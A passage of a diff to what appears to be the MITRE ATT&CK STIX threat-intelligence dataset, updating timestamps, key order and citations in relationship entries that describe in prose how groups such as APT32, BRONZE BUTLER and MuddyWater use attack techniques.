+ "url": "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
"description": "RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.",
"source_name": "RSA Shell Crew"
}
@@ -30525,7 +31551,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"type": "relationship",
- "modified": "2019-03-22T20:09:34.647Z",
+ "modified": "2020-04-17T21:11:30.416Z",
"created": "2017-05-31T21:33:27.043Z"
},
{
@@ -30659,22 +31685,27 @@
{
"id": "relationship--c87a8320-8705-4de3-93ee-2db5c00ea461",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: Symantec Tick Apr 2016)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan",
+ "source_name": "Symantec Tick Apr 2016",
"description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.",
- "source_name": "Symantec Tick Apr 2016"
+ "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
"type": "relationship",
- "modified": "2020-03-16T16:19:59.278Z",
+ "modified": "2020-06-24T01:27:31.920Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -30712,12 +31743,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5"
},
{
"id": "relationship--145634d0-cd6c-4184-965a-fe77a158ff97",
@@ -30728,7 +31759,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -30737,7 +31768,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.083Z",
+ "modified": "2020-04-16T19:41:40.396Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -30992,16 +32023,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.008Z",
+ "modified": "2020-05-14T15:14:33.568Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -31580,21 +32610,21 @@
],
"external_references": [
{
- "source_name": "Cymmetria Patchwork",
+ "url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf",
"description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.",
- "url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf"
+ "source_name": "Cymmetria Patchwork"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
}
],
"source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-11T13:53:05.580Z",
+ "modified": "2020-06-29T15:13:05.439Z",
"created": "2017-05-31T21:33:27.076Z"
},
{
@@ -31702,32 +32732,32 @@
{
"id": "relationship--dfcc52d8-4664-48c4-9e35-2be2cd649d93",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) created a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Cobalt Kitty 2017) The group has also used regsvr32 to run their backdoor.(Citation: ESET OceanLotus Mar 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) created a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. The group has also used regsvr32 to run their backdoor.(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 May 2017)(Citation: Cybereason Cobalt Kitty 2017) ",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html",
+ "description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
+ "url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
+ "source_name": "ESET OceanLotus Mar 2019"
+ },
+ {
+ "source_name": "FireEye APT32 May 2017",
"description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.",
- "source_name": "FireEye APT32 May 2017"
+ "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
},
{
"url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
"description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
"source_name": "Cybereason Cobalt Kitty 2017"
- },
- {
- "description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
- "url": "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
- "source_name": "ESET OceanLotus Mar 2019"
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.694Z",
+ "modified": "2020-06-19T20:04:12.233Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -31850,7 +32880,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d",
"type": "relationship",
- "modified": "2020-03-23T19:37:54.224Z",
+ "modified": "2020-06-19T20:07:09.769Z",
"created": "2017-05-31T21:33:27.031Z"
},
{
@@ -31935,7 +32965,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -31944,7 +32974,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.102Z",
+ "modified": "2020-04-16T19:41:40.432Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -32067,7 +33097,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47",
"type": "relationship",
- "modified": "2019-07-25T11:12:34.468Z",
+ "modified": "2020-07-14T19:39:44.767Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -32141,7 +33171,7 @@
"external_references": [
{
"url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
"source_name": "ESET RTM Feb 2017"
}
],
@@ -32149,7 +33179,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
"type": "relationship",
- "modified": "2020-03-30T01:02:25.918Z",
+ "modified": "2020-05-12T22:13:16.666Z",
"created": "2017-05-31T21:33:27.081Z"
},
{
@@ -32948,7 +33978,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef",
"type": "relationship",
- "modified": "2019-07-24T18:09:33.160Z",
+ "modified": "2020-07-14T19:44:50.970Z",
"created": "2017-05-31T21:33:27.027Z"
},
{
@@ -33007,12 +34037,12 @@
"url": "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF"
}
],
- "source_ref": "malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--101867a2-149c-4088-a90f-7af4b86e5013",
@@ -33117,12 +34147,12 @@
"url": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/"
}
],
- "source_ref": "intrusion-set--da49b9f1-ca99-443f-9728-0a074db66850",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "intrusion-set--da49b9f1-ca99-443f-9728-0a074db66850",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a"
},
{
"id": "relationship--a06bd922-b887-4134-81cb-1e4180cf5a5a",
@@ -33133,16 +34163,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
"relationship_type": "uses",
"target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.006Z",
+ "modified": "2020-05-14T14:30:09.423Z",
"created": "2017-05-31T21:33:27.055Z"
},
{
@@ -33161,15 +34190,20 @@
{
"id": "relationship--40032198-f003-4171-92a0-faf038f62a0b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) collected the victim's username and executed the whoami command on the victim's machine.(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) collected the victim's username and executed the whoami command on the victim's machine. [APT32](https://attack.mitre.org/groups/G0050) executed shellcode to collect the username on the victim's machine. (Citation: FireEye APT32 April 2020)(Citation: ESET OceanLotus)(Citation: Cybereason Cobalt Kitty 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
+ },
+ {
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
@@ -33181,13 +34215,13 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.723Z",
+ "modified": "2020-06-19T20:04:12.207Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
"id": "relationship--4c6aea43-27ba-4e6a-8907-e5db364a145b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) malware xxmm contains a UAC bypass tool for privilege escalation.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used a Windows 10 specific tool and xxmm to bypass UAC for privilege escalation.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -33196,13 +34230,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.075Z",
+ "modified": "2020-06-24T01:27:31.914Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -33261,16 +34300,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
"type": "relationship",
- "modified": "2020-03-16T15:28:54.593Z",
+ "modified": "2020-06-02T16:14:00.337Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -33318,36 +34357,36 @@
{
"id": "relationship--d361058d-a11b-470d-bed8-44bfd8e50393",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer transfers collected files to a hardcoded C2 server.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can transfer collected files to a hardcoded C2 server.(Citation: Palo Alto Gamaredon Feb 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.603Z",
+ "modified": "2020-06-22T17:54:15.519Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
"id": "relationship--55d44c4e-c864-4e6f-ac33-62f13cd08f0e",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has added Registry Run key KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding to establish persistence.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has added Registry Run key KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding to establish persistence.(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
@@ -33355,16 +34394,21 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "Talos MuddyWater May 2019",
+ "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019.",
"url": "https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
- "description": "Adamitis, D. et al. (2019, May 20). Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques. Retrieved June 5, 2019."
+ "source_name": "Talos MuddyWater May 2019"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.374Z",
+ "modified": "2020-05-18T19:04:37.811Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -33490,14 +34534,14 @@
"target_ref": "tool--bba595da-b73a-4354-aa6c-224d4de7cb4e",
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
],
"description": "(Citation: McAfee Honeybee)",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.319Z",
+ "modified": "2020-04-16T19:41:40.504Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -34007,7 +35051,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534",
"type": "relationship",
- "modified": "2020-03-29T23:32:53.631Z",
+ "modified": "2020-04-29T14:37:59.726Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -34074,7 +35118,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -34083,7 +35127,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.117Z",
+ "modified": "2020-04-16T19:41:40.518Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -34138,27 +35182,6 @@
"modified": "2020-03-25T16:00:35.796Z",
"created": "2018-10-17T00:14:20.652Z"
},
- {
- "id": "relationship--b3d63cea-ad1c-47a5-b9e5-09920bae0537",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
- "external_references": [
- {
- "source_name": "Check Point Rocket Kitten",
- "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
- "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
- }
- ],
- "description": "(Citation: Check Point Rocket Kitten)",
- "type": "relationship",
- "modified": "2020-03-18T13:34:21.388Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--e1d0ec8e-0970-4737-9605-1cf8a3ba1371",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -34189,7 +35212,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -34198,7 +35221,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
"type": "relationship",
- "modified": "2020-03-30T02:17:35.708Z",
+ "modified": "2020-04-16T19:41:40.490Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -34215,42 +35238,47 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--2305a634-b226-4da2-a766-bec5458f9447",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
"url": "https://securelist.com/muddywater/88059/",
"source_name": "Securelist MuddyWater Oct 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
